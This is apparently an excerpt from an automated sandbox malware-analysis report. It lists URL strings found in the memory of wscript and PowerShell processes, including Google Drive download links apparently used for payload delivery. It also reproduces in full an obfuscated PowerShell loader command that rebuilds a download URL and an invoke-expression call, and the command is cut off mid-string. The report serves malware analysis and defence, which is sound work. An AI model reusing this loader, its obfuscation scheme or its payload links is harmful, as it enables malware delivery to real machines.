Source: powershell.exe, 0000000C.00000002.1618429477.0000000007210000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 0000000C.00000002.1618429477.0000000007272000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: wscript.exe, 00000000.00000003.1236596248.000002A084C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235733408.000002A084C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236204508.000002A084C47000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1256594972.000002A082C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256830832.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256389650.000002A082C56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1257244710.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabH |
Source: wscript.exe, 00000000.00000003.1256594972.000002A082C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256830832.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256389650.000002A082C56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1257244710.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe |
Source: wscript.exe, 00000000.00000003.1256594972.000002A082C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256830832.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1256389650.000002A082C56000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1257244710.000002A082C6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en5N |
Source: wscript.exe, 00000000.00000003.1236386931.000002A084C38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236255670.000002A084C11000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bf2b026eb2 |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2B7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC8481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1615676256.00000000047A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC8481000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000C.00000002.1615676256.00000000047A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA1BF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googPR |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC86A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA1BF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC86A8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9KP |
Source: powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9KXR |
Source: wab.exe, 0000000F.00000002.1635549813.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY |
Source: wab.exe, 0000000F.00000002.1635549813.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY0 |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8925000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: wab.exe, 0000000F.00000002.1635549813.0000000006F4A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/ |
Source: wab.exe, 0000000F.00000002.1635549813.0000000006F4A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/c |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K&export=download |
Source: wab.exe, 0000000F.00000002.1635549813.0000000006F35000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1JrUDq6Xrg7Tsx3kQRKkvvxtdk0y1VjAY&export=download |
Source: powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCC9780000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrep |